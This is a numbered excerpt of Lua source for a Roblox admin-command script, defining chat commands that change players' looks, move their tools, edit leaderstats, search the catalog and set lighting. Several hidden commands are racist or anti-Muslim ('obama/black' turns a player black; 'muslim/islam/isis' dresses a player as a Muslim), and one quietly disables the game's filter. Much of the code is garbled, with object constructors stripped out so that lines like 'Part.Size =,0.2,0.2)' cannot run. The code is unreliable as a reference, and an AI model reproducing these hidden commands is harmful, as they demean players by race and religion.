  7093. [{"mega", "huge", "giant", "large", "big"}] = {"player", "Makes player's character mega", 1, "Member", false, function(Speaker, Rank, Arguments)
  7094. local Players = STRING:Scan(Arguments[1], Speaker)
  7095. for _,Player in pairs(Players) do
  7096. CORE:Scale(Player, 500)
  7097. end
  7098. end};
  7100. [{"gold", "goldify"}] = {"player", "Makes player's character gold", 1, "Member", false, function(Speaker, Rank, Arguments)
  7101. local Players = STRING:Scan(Arguments[1], Speaker)
  7102. for _,Player in pairs(Players) do
  7103. if Player.Character then
  7104. CORE:ScanItems(Player.Character, {"BasePart"}, function(Obj)
  7105. Obj.Reflectance = 0.5
  7106. Obj.BrickColor ="New Yeller")
  7107. end)
  7108. end
  7109. end
  7110. end};
  7112. [{"shine", "shiny", "shinify", "shineify"}] = {"player", "Makes player's character shiny", 1, "Member", false, function(Speaker, Rank, Arguments)
  7113. local Players = STRING:Scan(Arguments[1], Speaker)
  7114. for _,Player in pairs(Players) do
  7115. if Player.Character then
  7116. CORE:ScanItems(Player.Character, {"BasePart"}, function(Obj)
  7117. Obj.Reflectance = 0.5
  7118. end)
  7119. end
  7120. end
  7121. end};
  7123. [{"ghost", "ghostify", "spook", "spooky"}] = {"player", "Makes player's character a ghost", 1, "Member", false, function(Speaker, Rank, Arguments)
  7124. local Players = STRING:Scan(Arguments[1], Speaker)
  7125. for _,Player in pairs(Players) do
  7126. if Player.Character then
  7127. CORE:ScanItems(Player.Character, {"BasePart"}, function(Obj)
  7128. Obj.Transparency = 0.5
  7129. Obj.Reflectance = 0
  7130. Obj.BrickColor ="Institutional white")
  7131. end)
  7132. CORE:ScanItems(Player.Character, {"Texture", "Decal"}, function(Obj)
  7133. Obj.Transparency = 0.5
  7134. end)
  7135. end
  7136. end
  7137. end};
  7139. [{"nolimbs", "nolimb"}] = {"player", "Removes player's limbs", 1, "Member", false, function(Speaker, Rank, Arguments)
  7140. local Players = STRING:Scan(Arguments[1], Speaker)
  7141. for _,Player in pairs(Players) do
  7142. if Player.Character then
  7143. for _,Obj in pairs(Player.Character:GetChildren()) do
  7144. local Valid = false
  7145. for _,Name in pairs({"Right Arm", "Left Arm", "Right Leg", "Left Leg"}) do if Obj.Name == Name then Valid = true end end
  7146. if Valid == true then Obj:Destroy() end
  7147. end
  7148. end
  7149. end
  7150. end};
  7152. [{"noarms", "noarm"}] = {"player", "Removes player's arms", 1, "Member", false, function(Speaker, Rank, Arguments)
  7153. local Players = STRING:Scan(Arguments[1], Speaker)
  7154. for _,Player in pairs(Players) do
  7155. if Player.Character then
  7156. for _,Obj in pairs(Player.Character:GetChildren()) do
  7157. local Valid = false
  7158. for _,Name in pairs({"Right Arm", "Left Arm"}) do if Obj.Name == Name then Valid = true end end
  7159. if Valid == true then Obj:Destroy() end
  7160. end
  7161. end
  7162. end
  7163. end};
  7165. [{"nolegs", "noleg"}] = {"player", "Removes player's legs", 1, "Member", false, function(Speaker, Rank, Arguments)
  7166. local Players = STRING:Scan(Arguments[1], Speaker)
  7167. for _,Player in pairs(Players) do
  7168. if Player.Character then
  7169. for _,Obj in pairs(Player.Character:GetChildren()) do
  7170. local Valid = false
  7171. for _,Name in pairs({"Right Leg", "Left Leg"}) do if Obj.Name == Name then Valid = true end end
  7172. if Valid == true then Obj:Destroy() end
  7173. end
  7174. end
  7175. end
  7176. end};
  7178. [{"noaccessories", "noaccessory", "noacs", "nohats", "nohat"}] = {"player", "Removes player's accessories", 1, "Member", false, function(Speaker, Rank, Arguments)
  7179. local Players = STRING:Scan(Arguments[1], Speaker)
  7180. for _,Player in pairs(Players) do
  7181. if Player.Character then
  7182. for _,Obj in pairs(Player.Character:GetChildren()) do
  7183. if Obj:IsA("Accoutrement") then
  7184. Obj:Destroy()
  7185. end
  7186. end
  7187. end
  7188. end
  7189. end};
  7191. [{"naked", "noclothes"}] = {"player", "Removes player's clothes and hats", 1, "Member", false, function(Speaker, Rank, Arguments)
  7192. local Players = STRING:Scan(Arguments[1], Speaker)
  7193. for _,Player in pairs(Players) do
  7194. Player:ClearCharacterAppearance()
  7195. end
  7196. end};
  7198. [{"playerdatabase", "playerbase", "playerdatab", "playerdb", "plrdatabase", "plrdatab", "plrdb", "pdatabase", "pdatab", "pdb"}] = {"", "Database of all the players in the server", 0, "Member", false, function(Speaker, Rank, Arguments)
  7199. local Players = Server.Data:GetDataStore("MML's Admin"):GetAsync("Players")
  7200. local TmpPlayers = {}
  7201. local Output = {}
  7202. for _,Data in pairs(Players) do
  7203. table.insert(Output, {"Name: "..Data.Name.." | UserID: "..Data.UserId.." | Rank: "..Data.Rank.." | Last Joined: "..(Data.LastJoin or "Unknown").." | Account Age: "..(Data.AccountAge or "Unknown"), ""..Data.Name})
  7204. end
  7205. GUI:ListGui(Speaker, "Player Database", Output, 120563622)
  7206. end};
  7208. [{"clearplayerdatabase", "clearpdb", "cpdb"}] = {"", "Clears the player databse", 0, "Owner", false, function(Speaker, Rank, Arguments)
  7209. Server.Data:GetDataStore("MML's Admin"):SetAsync("Players", {})
  7210. GUI:SendHint(Speaker, "Player Database cleared", 5)
  7211. end};
  7213. [{"hack", "hax"}] = {"player", "Fake hacks player", 1, "Member", true, function(Speaker, Rank, Arguments)
  7214. local Players = STRING:Scan(Arguments[1], Speaker)
  7215. for _,Player in pairs(Players) do
  7216. GUI:FakeHack(Player)
  7217. end
  7218. end};
  7220. [{"clonetools", "clonet"}] = {"player", "Clones player's tools and gives the to the speaker", 1, "Member", false, function(Speaker, Rank, Arguments)
  7221. local Players = STRING:Scan(Arguments[1], Speaker)
  7222. for _,Player in pairs(Players) do
  7223. if Player:FindFirstChild("Backpack") and Speaker:FindFirstChild("Backpack") then
  7224. for _,Object in pairs(Player.Backpack:GetChildren()) do
  7225. if Object:IsA("Tool") or Object:IsA("HopperBin") then
  7226. local Clone = Object:Clone()
  7227. Clone.Parent = Speaker.Backpack
  7228. end
  7229. end
  7230. end
  7231. end
  7232. end};
  7234. [{"taketools", "taket", "tt"}] = {"player", "Clone player's tools and gives the to the speaker", 1, "Member", false, function(Speaker, Rank, Arguments)
  7235. local Players = STRING:Scan(Arguments[1], Speaker)
  7236. for _,Player in pairs(Players) do
  7237. if Player:FindFirstChild("Backpack") and Speaker:FindFirstChild("Backpack") then
  7238. for _,Object in pairs(Player.Backpack:GetChildren()) do
  7239. if Object:IsA("Tool") or Object:IsA("HopperBin") then
  7240. Object.Parent = Speaker.Backpack
  7241. end
  7242. end
  7243. end
  7244. end
  7245. end};
  7247. [{"givetools", "givet", "gt"}] = {"player", "Clone the speaker's tools and gives the to player", 1, "Member", false, function(Speaker, Rank, Arguments)
  7248. local Players = STRING:Scan(Arguments[1], Speaker)
  7249. for _,Player in pairs(Players) do
  7250. if Player:FindFirstChild("Backpack") and Speaker:FindFirstChild("Backpack") then
  7251. for _,Object in pairs(Speaker.Backpack:GetChildren()) do
  7252. if Object:IsA("Tool") or Object:IsA("HopperBin") then
  7253. local Clone = Object:Clone()
  7254. Clone.Parent = Player.Backpack
  7255. end
  7256. end
  7257. end
  7258. end
  7259. end};
  7261. [{"notools", "notool", "cleartools", "cleantools", "ctools", "untools"}] = {"player", "Clears player's backpack", 1, "Member", false, function(Speaker, Rank, Arguments)
  7262. local Players = STRING:Scan(Arguments[1], Speaker)
  7263. for _,Player in pairs(Players) do
  7264. if Player:FindFirstChild("Backpack") then
  7265. Player.Backpack:ClearAllChildren()
  7266. end
  7267. if Player.Character ~= nil then
  7268. for _,Obj in pairs(Player.Character:GetChildren()) do
  7269. if Obj:IsA("Tool") or Obj:IsA("HopperBin") then
  7270. Obj:Destroy()
  7271. end
  7272. end
  7273. end
  7274. end
  7275. end};
  7277. [{"vomit", "puke", "throwup", "barf"}] = {"player", "Makes player vomit", 1, "Member", true, function(Speaker, Rank, Arguments)
  7278. local Players = STRING:Scan(Arguments[1], Speaker)
  7279. for _,Player in pairs(Players) do
  7280. if Player.Character then
  7281. if Player.Character:FindFirstChild("Head") then
  7282. if Player.Character.Torso:FindFirstChild("Neck") and Player.Character.Head:FindFirstChild("face") then
  7283. coroutine.wrap(function()
  7284. if Player.Character.Head.face.Texture ~= "rbxassetid://24067663" then if Player.Character.Head.face.Texture ~= "rbxassetid://28118994" then
  7285. local OldFace = Player.Character.Head.face.Texture
  7286. Player.Character.Torso.Neck.C0 = Player.Character.Torso.Neck.C0 * CFrame.Angles(math.rad(20),0,0)
  7287. Player.Character.Head.BrickColor ="Br. yellowish green")
  7288. Player.Character.Head.face.Texture = "rbxassetid://24067663"
  7289. local Sound = SOUND:MakeSound(Player.Character.Head, 142539016, 1, 0.9)
  7290. Sound:Play()
  7291. coroutine.wrap(function() for i = 1,100 do wait()
  7292. local Part ="Part", Player.Character) Part.BrickColor ="Br. yellowish green") Part.FormFactor = "Custom" Part.Elasticity = 0.1 Part.Size =,0.2,0.2) Part.Position = Player.Character.Head.Position +,10)/10, math.random(-10,10)/10, math.random(-10,10)/10)
  7293. coroutine.wrap(function() wait(3) Part:Destroy() end)()
  7294. end
  7295. Sound:Destroy() Player.Character.Head.face.Texture = OldFace Player.Character.Torso.Neck.C0 = Player.Character.Torso.Neck.C0 * CFrame.Angles(-math.rad(20),0,0) pcall(function() Player.Character.Head.BrickColor = Player.Character["Body Colors"].HeadColor end) end)()
  7296. end end
  7297. end)()
  7298. end
  7299. end
  7300. end
  7301. end
  7302. end};
  7304. [{"fart", "stink"}] = {"player", "Makes player fart", 1, "Member", true, function(Speaker, Rank, Arguments)
  7305. local Players = STRING:Scan(Arguments[1], Speaker)
  7306. for _,Player in pairs(Players) do
  7307. if Player.Character then
  7308. if Player.Character:FindFirstChild("Torso") and Player.Character.Head:FindFirstChild("face") then
  7309. coroutine.wrap(function()
  7310. if Player.Character.Head.face.Texture ~= "rbxassetid://24067663" then if Player.Character.Head.face.Texture ~= "rbxassetid://28118994" then
  7311. local OldFace = Player.Character.Head.face.Texture
  7312. local Fart ="Part", Player.Character.Torso) Fart.Name = "Fart" Fart.Size =,1,1) Fart.Position =,100,0) Fart.Transparency = 1
  7313. local Weld ="Weld", Fart) Weld.Part0 = Fart Weld.Part1 = Player.Character.Torso Weld.C0 =,-1,-1) * CFrame.Angles(math.rad(-90),0,0)
  7314. local Smoke ="Smoke", Fart) Smoke.Name = "Fart Effect" Smoke.Color =, 100/255, 30/255)
  7315. Player.Character.Head.face.Texture = "rbxassetid://28118994"
  7316. local Sound = SOUND:MakeSound(Fart, 130833677, 1, 0.8)
  7317. Sound:Play()
  7318. wait(1)
  7319. Smoke.Enabled = false
  7320. wait(1)
  7321. Fart:Destroy()
  7322. Fart:Destroy()
  7323. Player.Character.Head.face.Texture = OldFace
  7324. end end
  7325. end)()
  7326. end
  7327. end
  7328. end
  7329. end};
  7331. [{"graffiti", "graf", "gra", "draw"}] = {"player", "Gives player a tool to do graffiti", 1, "Member", true, function(Speaker, Rank, Arguments)
  7332. local Players = STRING:Scan(Arguments[1], Speaker)
  7333. for _,Player in pairs(Players) do
  7334. if Player:FindFirstChild("Backpack") then
  7335. CORE:ExecuteResource("Graffiti", Player.Backpack, {["Color"] = GUI:GetColor()})
  7336. end
  7337. end
  7338. end};
  7340. [{"cleargraffiti", "cleargraf", "cleargra", "cleardraw", "cleangraffiti", "cleangraf", "cleangra", "cleandraw", "cgraffiti", "cgraf", "cgra", "cdraw"}] = {"", "Clears any graffiti", 0, "Admin", false, function(Speaker, Rank, Arguments)
  7341. local Players = STRING:Scan(Arguments[1], Speaker)
  7342. for _,Player in pairs(Players) do
  7343. if Player.Character and Player.Character:FindFirstChild("MMLGraffiti") then
  7344. Player.Character.MMLGraffiti:ClearAllChildren()
  7345. end
  7346. end
  7347. end};
  7349. [{"light", "spotlight"}] = {"player", "Makes player and a small radius around whom to light up", 1, "Member", false, function(Speaker, Rank, Arguments)
  7350. local Players = STRING:Scan(Arguments[1], Speaker)
  7351. for _,Player in pairs(Players) do
  7352. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7353. local Light = Player.Character.Torso:FindFirstChild("MML Light") if Light then Light:Destroy() end
  7354. Light ="PointLight", Player.Character.Torso) Light.Name = "MML Light" Light.Range = 20 Light.Brightness = 2
  7355. end
  7356. end
  7357. end};
  7359. [{"lamp", "pointlight", "headlight", "headlamp"}] = {"player", "Makes player and a small radius in from of whom to light up as if there was a head light", 1, "Member", false, function(Speaker, Rank, Arguments)
  7360. local Players = STRING:Scan(Arguments[1], Speaker)
  7361. for _,Player in pairs(Players) do
  7362. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7363. local Light = Player.Character.Torso:FindFirstChild("MML Lamp") if Light then Light:Destroy() end
  7364. Light ="SpotLight", Player.Character.Torso) Light.Name = "MML Lamp" Light.Range = 30 Light.Brightness = 5
  7365. end
  7366. end
  7367. end};
  7369. [{"nolight", "nolamp", "unlight", "unlamp"}] = {"player", "Removes player's light and/or lamp", 1, "Member", false, function(Speaker, Rank, Arguments)
  7370. local Players = STRING:Scan(Arguments[1], Speaker)
  7371. for _,Player in pairs(Players) do
  7372. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7373. local Lights = {}
  7374. for _,Obj in pairs(Player.Character.Torso:GetChildren()) do
  7375. if Obj.Name == "MML Lamp" or Obj.Name == "M".."ML Light" then
  7376. table.insert(Lights, Obj)
  7377. end
  7378. end
  7379. for _,Light in pairs(Lights) do
  7380. coroutine.wrap(function()
  7381. for i = 1,20 do
  7382. Light.Brightness = Light.Brightness/5
  7383. wait()
  7384. end
  7385. Light:Destroy()
  7386. end)()
  7387. end
  7388. end
  7389. end
  7390. end};
  7392. [{"drug", "lsd"}] = {"player", "Gives player the effect of being on lsd", 1, "Member", false, function(Speaker, Rank, Arguments)
  7393. local Players = STRING:Scan(Arguments[1], Speaker)
  7394. for _,Player in pairs(Players) do
  7395. if Player.Character and Player:FindFirstChild("PlayerGui") then
  7396. local SG = Player.PlayerGui:FindFirstChild("MML Drug") if SG then SG:Destroy() end
  7397. SG ="ScreenGui", Player.PlayerGui) SG.Name = "MML Drug"
  7398. local Frame ="Frame", SG) Frame.Size =,0,1,0) Frame.BackgroundTransparency = 0.5
  7399. local Stop = false
  7400. coroutine.wrap(function()
  7401. repeat
  7402. Frame.BackgroundColor3 =,255)/255,math.random(0,255)/255,math.random(0,255)/255)
  7403. wait(0.1)
  7404. until not SG or not SG.Parent
  7405. end)()
  7406. CORE:ExecuteResource("Drug", Player.Character)
  7407. end
  7408. end
  7409. end};
  7411. [{"nodrug", "nolsd", "undrug", "unlsd"}] = {"player", "Removes drug effect", 1, "Member", false, function(Speaker, Rank, Arguments)
  7412. local Players = STRING:Scan(Arguments[1], Speaker)
  7413. for _,Player in pairs(Players) do
  7414. if Player:FindFirstChild("PlayerGui") then
  7415. local SG = Player.PlayerGui:FindFirstChild("MML Drug") if SG then SG:Destroy() end
  7416. wait() CORE:RestoreCamera(Player)
  7417. end
  7418. end
  7419. end};
  7421. [{"searchg", "searchgear"}] = {"string", "Searches the catalog for the gear string", 1, "Member", false, function(Speaker, Rank, Arguments)
  7422. local AbuseMode = false
  7423. if Rank == "Member" then AbuseMode = Settings.DisableAbuse end
  7424. MARKET:ShowSearch(Speaker, 5, Arguments[1], function(ID)
  7425. if Speaker:FindFirstChild("Backpack") then
  7426. CORE:Insert(ID, Speaker.Backpack, true, {"Tool", "HopperBin"}, AbuseMode)
  7427. end
  7428. end)
  7429. end, Http = true};
  7431. [{"searchaccessory", "searchaccessories", "searchacs", "searcha", "searchhat", "searchhats", "searchh"}] = {"string(type) string(query)", "Searches the catalog for the accessory string(query) with the type of string(type)", 1, "Member", false, function(Speaker, Rank, Arguments)
  7432. local Type = "all"
  7433. local Query = string.lower(Arguments[1])
  7434. local Arguments = STRING:GetSplit(Query, 2, Settings.Bet)
  7435. if #Arguments == 2 and Assets.AccessoryTypes[Arguments[1]] then
  7436. Type = Arguments[1]
  7437. Query = Arguments[2]
  7438. end
  7439. MARKET:ShowSearch(Speaker, 11, Query, function(ID)
  7440. if Speaker.Character then
  7441. CORE:Insert(ID, Speaker.Character, true, {"Accoutrement"})
  7442. end
  7443. end, MARKET:AccessoryToSubcategory(Type))
  7444. end, Http = true};
  7446. [{"searchp", "searchpack", "searchpackage"}] = {"string", "Searches the catalog for the package string", 1, "Member", false, function(Speaker, Rank, Arguments)
  7447. MARKET:ShowSearch(Speaker, 11, Arguments[1], function(ID)
  7448. if Speaker.Character then
  7449. CORE:GivePackage(Speaker, ID)
  7450. end
  7451. end, 11)
  7452. end, Http = false};
  7454. [{"nopackage", "nopack", "unpackage", "unpack"}] = {"player", "Removes all packages from player", 1, "Member", false, function(Speaker, Rank, Arguments)
  7455. local Players = STRING:Scan(Arguments[1], Speaker)
  7456. for _,Player in pairs(Players) do
  7457. CORE:GivePackage(Player)
  7458. end
  7459. end};
  7461. [{"package", "pack", "morph"}] = {"player num(ID)", "Gives player the package with num(ID)", 2, "Member", false, function(Speaker, Rank, Arguments)
  7462. local Players = STRING:Scan(Arguments[1], Speaker)
  7463. for _,Player in pairs(Players) do
  7464. CORE:GivePackage(Player, Arguments[2])
  7465. end
  7466. end, Http = false};
  7468. [{"change", "changestat", "changeleaderstat", "changestats", "changeleaderstats"}] = {"player string(key) value(string/num)", "Changes player's leaderstats for key(Coins, money, ext) to value", 3, "Member", false, function(Speaker, Rank, Arguments)
  7469. local Players = STRING:Scan(Arguments[1], Speaker)
  7470. for _,Player in pairs(Players) do
  7471. local Stats = Player:FindFirstChild("leaderstats")
  7472. if Stats ~= nil then
  7473. for _,Stat in pairs(Stats:GetChildren()) do
  7474. if string.sub(string.lower(Stat.Name),1,#Arguments[2]) == string.lower(Arguments[2]) then
  7475. ypcall(function() Stat.Value = Arguments[3] end)
  7476. end
  7477. end
  7478. end
  7479. end
  7480. end};
  7482. [{"shirt"}] = {"player num(ID)", "Changes player's shirt to num(ID)", 2, "Member", false, function(Speaker, Rank, Arguments)
  7483. local ID = tonumber(Arguments[2])
  7484. local Players = STRING:Scan(Arguments[1], Speaker)
  7485. for _,Player in pairs(Players) do
  7486. for _,Player in pairs(Players) do
  7487. if Player.Character ~= nil then
  7488. local Obj = Player.Character:FindFirstChild("Shirt")
  7489. if Obj then
  7490. Obj.ShirtTemplate = "rbxassetid://"..MARKET:GetImageFormat(ID)
  7491. else
  7492. Obj ="Shirt", Player.Character) Obj.Name = "Shirt" Obj.ShirtTemplate = "rbxassetid://"..MARKET:GetImageFormat(ID)
  7493. end
  7494. coroutine.wrap(function() Obj.Parent = nil wait(0.1) Obj.Parent = Player.Character end)()
  7495. end
  7496. end
  7497. end
  7498. end};
  7500. [{"pants"}] = {"player num(ID)", "Changes player's pants to num(ID)", 2, "Member", false, function(Speaker, Rank, Arguments)
  7501. local ID = tonumber(Arguments[2])
  7502. local Players = STRING:Scan(Arguments[1], Speaker)
  7503. for _,Player in pairs(Players) do
  7504. for _,Player in pairs(Players) do
  7505. if Player.Character ~= nil then
  7506. local Obj = Player.Character:FindFirstChild("Pants")
  7507. if Obj then
  7508. Obj.PantsTemplate = "rbxassetid://"..MARKET:GetImageFormat(ID)
  7509. else
  7510. Obj ="Pants", Player.Character) Obj.Name = "Pants" Obj.PantsTemplate = "rbxassetid://"..MARKET:GetImageFormat(ID)
  7511. end
  7512. coroutine.wrap(function() Obj.Parent = nil wait(0.1) Obj.Parent = Player.Character end)()
  7513. end
  7514. end
  7515. end
  7516. end};
  7518. [{"tshirt"}] = {"player num(ID)", "Changes player's T-shirt to num(ID)", 2, "Member", false, function(Speaker, Rank, Arguments)
  7519. local ID = tonumber(Arguments[2])
  7520. local Players = STRING:Scan(Arguments[1], Speaker)
  7521. for _,Player in pairs(Players) do
  7522. for _,Player in pairs(Players) do
  7523. if Player.Character ~= nil then
  7524. if Player.Character:FindFirstChild("Torso") then
  7525. local Obj1 = Player.Character:FindFirstChild("Shirt Graphic")
  7526. local Obj2 = Player.Character.Torso:FindFirstChild("roblox")
  7527. if Obj1 then
  7528. Obj1.Graphic = "rbxassetid://"..MARKET:GetImageFormat(ID)
  7529. else
  7530. Obj1 ="ShirtGraphic", Player.Character) Obj1.Name = "Shirt Graphic" Obj1.Graphic = "rbxassetid://"..MARKET:GetImageFormat(ID)
  7531. end
  7532. if Obj2 then
  7533. Obj2.Texture = "rbxassetid://"..MARKET:GetImageFormat(ID)
  7534. else
  7535. Obj2 ="Decal", Player.Character.Torso) Obj2.Name = "roblox" Obj2.Texture = "rbxassetid://"..MARKET:GetImageFormat(ID) Obj2.Face = "Front"
  7536. end
  7537. coroutine.wrap(function() Obj1.Parent = nil wait(0.1) Obj1.Parent = Player.Character end)()
  7538. coroutine.wrap(function() Obj2.Parent = nil wait(0.2) Obj2.Parent = Player.Character.Torso end)()
  7539. end
  7540. end
  7541. end
  7542. end
  7543. end};
  7545. [{"oder", "od", "onlinedater", "onlinedate"}] = {"player", "Changes player's character to be an online dater", 1, "Member", false, function(Speaker, Rank, Arguments)
  7546. local Players = STRING:Scan(Arguments[1], Speaker)
  7547. for _,Player in pairs(Players) do
  7548. CORE:ChangeCharacter(Player, OderIDs[math.random(1,#OderIDs)], false, Speaker)
  7549. end
  7550. end};
  7552. [{"cookie"}] = {"player", "Gives player a cookie if the speaker is in the admin group", 1, "Member", false, function(Speaker, Rank, Arguments)
  7553. if CORE:InAdminGroup(Speaker) then
  7554. local Players = STRING:Scan(Arguments[1], Speaker)
  7555. for _,Player in pairs(Players) do
  7556. if Player:FindFirstChild("Backpack") then
  7557. local Tool ="Tool", Player.Backpack) Tool.Name = "Cookie" Tool.ToolTip = "Yey! Cookies!" Tool.GripForward =,1,0) Tool.GripPos =,-0.3,-0.1) Tool.GripRight =,0,-1) Tool.GripUp =,0,1)
  7558. local Handle ="Part", Tool) Handle.Name = "Handle" Handle.Size =,1,1)
  7559. local Mesh ="SpecialMesh", Handle) Mesh.MeshType = "FileMesh" Mesh.Scale =,0.4,0.4) Mesh.MeshId = "rbxassetid://20939848" Mesh.TextureId = "rbxassetid://21456464"
  7560. local Anim ="Animation", Tool) Anim.Name = "EatCookie" Anim.AnimationId = "rbxassetid://29517689"
  7561. CORE:ExecuteResource("CookieTool", Tool)
  7562. end
  7563. end
  7564. end
  7565. end};
  7567. [{"decal", "image"}] = {"num(ID)", "Allows player to insert num(ID) as a decal", 1, "Member", false, function(Speaker, Rank, Arguments)
  7568. if Speaker:FindFirstChild("Backpack") and tonumber(Arguments[1]) then
  7569. CORE:ExecuteResource("InsertDecal", Speaker.Backpack, {["DecalID"] = MARKET:GetImageFormat(tonumber(Arguments[1]))})
  7570. end
  7571. end};
  7573. [{"insert", "model", "ins"}] = {"num(ID)", "Allows player to insert num(ID) as a model(Only works if the model is owned by the owner of the game or ROBLOX)", 1, "Member", false, function(Speaker, Rank, Arguments)
  7574. if Speaker:FindFirstChild("Backpack") and tonumber(Arguments[1]) then
  7575. local Model = CORE:Insert(tonumber(Arguments[1]), Server.RS)
  7576. Model:MakeJoints()
  7577. for i = 1,math.random(10,20) do
  7578. Model.Name = Model.Name..string.char(math.random(97,122))
  7579. end
  7580. if Model:GetChildren()[1] then
  7581. table.insert(Objects, Model)
  7582. CORE:ExecuteResource("InsertModel", Speaker.Backpack, {["Model"] = Model})
  7583. end
  7584. end
  7585. end};
  7587. [{"animate", "animation", "anim"}] = {"player num(ID)", "Animates player to num(ID)", 2, "Member", false, function(Speaker, Rank, Arguments)
  7588. local ID = tonumber(Arguments[2])
  7589. local Players = STRING:Scan(Arguments[1], Speaker)
  7590. for _,Player in pairs(Players) do
  7591. if Player.Character then
  7592. CORE:ExecuteResource("PlayAnimation", Player.Character, {["AnimationID"] = Arguments[2]})
  7593. end
  7594. end
  7595. end};
  7597. [{"noanimate", "moanimation", "noanim", "unanimate", "unanimation", "unanim"}] = {"player", "Stops animations playing from the animate command", 1, "Member", false, function(Speaker, Rank, Arguments)
  7598. local Players = STRING:Scan(Arguments[1], Speaker)
  7599. for _,Player in pairs(Players) do
  7600. if Player.Character then
  7601. local StopAnim = Player.Character:FindFirstChild("Stop MML Animate")
  7602. if StopAnim then StopAnim:Destroy() end
  7603. end
  7604. end
  7605. end};
  7607. [{"ambient"}] = {"Color3(1) Color3(2) Color3(3)", "Changes the ambient lighting to Red - Color3(1) Green - Color3(2) Blue - Color3(3) (Out of 255)", 3, "Member", false, function(Speaker, Rank, Arguments)
  7608. if tonumber(Arguments[1]) and tonumber(Arguments[2]) and tonumber(Arguments[3]) then
  7609. Server.Lighting.Ambient =[1])/255,tonumber(Arguments[2])/255,tonumber(Arguments[3])/255)
  7610. end
  7611. end};
  7613. [{"brightness", "bright"}] = {"num", "Changes the lighting brightness to num", 1, "Member", false, function(Speaker, Rank, Arguments)
  7614. if tonumber(Arguments[1]) then
  7615. Server.Lighting.Brightness = tonumber(Arguments[1])
  7616. end
  7617. end};
  7619. [{"pl", "playerlist"}] = {"player", "Enables player to see the player list", 1, "Member", false, function(Speaker, Rank, Arguments)
  7620. local Players = STRING:Scan(Arguments[1], Speaker)
  7621. for _,Player in pairs(Players) do
  7622. GUI:CoreGui(Player, "PlayerList", true)
  7623. end
  7624. end};
  7626. [{"npl", "nopl", "unpl", "noplayerlist", "unplayerlist"}] = {"player", "Disables player to see the player list", 1, "Member", false, function(Speaker, Rank, Arguments)
  7627. local Players = STRING:Scan(Arguments[1], Speaker)
  7628. for _,Player in pairs(Players) do
  7629. local Players = STRING:Scan(Arguments[1], Speaker)
  7630. GUI:CoreGui(Player, "PlayerList", false)
  7631. end
  7632. end};
  7634. [{"bc", "tbc", "obc"}] = {"player", "What do you know, it's a real command!", 1, "Member", false, function(Speaker, Rank, Arguments)
  7635. GUI:SendMessage(Speaker, "Wow, you thought this was a command", "Did you look at the comments by chance?", 5253865)
  7636. end, Hidden = true};
  7638. [{"obama", "black", "1337"}] = {"player", "Turns player black", 1, "Member", false, function(Speaker, Rank, Arguments)
  7639. local Players = STRING:Scan(Arguments[1], Speaker)
  7640. for _,Player in pairs(Players) do
  7641. CORE:ChangeCharacter(Player, 1337, false, Speaker)
  7642. end
  7643. end, Hidden = true};
  7645. [{"muslim", "islam", "isis"}] = {"player", "Turns player into a muslim", 1, "Member", false, function(Speaker, Rank, Arguments)
  7646. local Players = STRING:Scan(Arguments[1], Speaker)
  7647. for _,Player in pairs(Players) do
  7648. if Player.Character and Player.Character:FindFirstChild("Head") and Player.Character.Head:FindFirstChild("face") then
  7649. ypcall(function() Player.Character.Torso.roblox:Destroy() end)
  7650. Player:ClearCharacterAppearance()
  7651. CORE:Insert(12436480, Player.Character, true)
  7652. Player.Character.Head.face.Texture = "rbxassetid://110287880"
  7653."Shirt", Player.Character).ShirtTemplate = "rbxassetid://205596436"
  7654."Pants", Player.Character).PantsTemplate = "rbxassetid://205596483"
  7655. end
  7656. end
  7657. end, Hidden = true};
  7659. [{"noob", "noobify", "boon"}] = {"player", "Turns player into a noob", 1, "Member", false, function(Speaker, Rank, Arguments)
  7660. local Players = STRING:Scan(Arguments[1], Speaker)
  7661. for _,Player in pairs(Players) do
  7662. CORE:ChangeCharacter(Player, 0, false, Speaker)
  7663. end
  7664. end};
  7666. [{"nofilter", "unfilter", "defilter"}] = {"", "Removes current filter", 0, "Owner", false, function(Speaker, Rank, Arguments)
  7667. ShouldFilter = false
  7668. end, Hidden = true};
  7670. [{"bet"}] = {"string", "Changes the bet to string", 1, "Owner", false, function(Speaker, Rank, Arguments)
  7671. local Bet = Arguments[1]
  7672. if Bet == "/" or Bet == "-" or Bet == "(" or Bet == ")" then
  7673. GUI:SendMessage(Speaker, "Cannot change bet", "RED Illegal characters used to become a bet", "Error")
  7674. elseif #Bet > 5 then
  7675. GUI:SendMessage(Speaker, "Bet too long", "RED The bet is too long and is over 5 characters (You have "..#Bet.." characters)", "Error")
  7676. else
  7677. local Answer = GUI:PromptMessageWithButtons(Speaker, "Are you sure you want to change the bet", "You are about to change the bet from '"..Settings.Bet.."' to '"..Bet.."' and commands like "..Settings.Prefix.."ff"..Settings.Bet.."me will be changed to "..Settings.Prefix.."ff"..Bet.."me, Continue?", "Question", {"Yes", "No"})
  7678. if Answer == "Yes" then
  7679. local OldBet = Settings.Bet
  7680. CORE:ChangeBet(Bet)
  7681. GUI:MessageAdmins("Bet Change", "The bet has changed from '"..OldBet.."' to '"..Bet.."' and commands like "..Settings.Prefix.."ff"..OldBet.."me will be changed to "..Settings.Prefix.."ff"..Bet.."me")
  7682. end
  7683. end
  7684. end};
  7686. [{"prefix"}] = {"string", "Changes the prefix to string", 1, "Owner", false, function(Speaker, Rank, Arguments)
  7687. local Prefix = Arguments[1]
  7688. if #Prefix > 5 then
  7689. GUI:SendMessage(Speaker, "Prefix too long", "RED The Prefix is too long and is over 5 characters (You have "..#Prefix.." characters)", "Error")
  7690. else
  7691. local Answer = GUI:PromptMessageWithButtons(Speaker, "Are you sure you want to change the Prefix", "You are about to change the Prefix from '"..Settings.Prefix.."' to '"..Prefix.."' and commands like "..Settings.Prefix.."ff"..Settings.Bet.."me will be changed to "..Prefix.."ff"..Settings.Bet.."me, Continue?", "Question", {"Yes", "No"})
  7692. if Answer == "Yes" then
  7693. local OldPrefix = Settings.Prefix
  7694. Settings.Prefix = Prefix
  7695. GUI:MessageAdmins("Prefix Change", "The Prefix has changed from '"..OldPrefix.."' to '"..Prefix.."' and commands like "..OldPrefix.."ff"..Settings.Bet.."me will be changed to "..Prefix.."ff"..Settings.Bet.."me")
  7696. end
  7697. end
  7698. end};
  7700. [{"commandbar", "cmdbar", "cbar", "commandgui", "cmdgui", "cgui", "commandbox", "cmdbox", "cbox"}] = {"", "Gives you a command bar to enter commands", 0, "Member", false, function(Speaker, Rank, Arguments)
  7701. GUI:CommandBar(Speaker)
  7702. end};
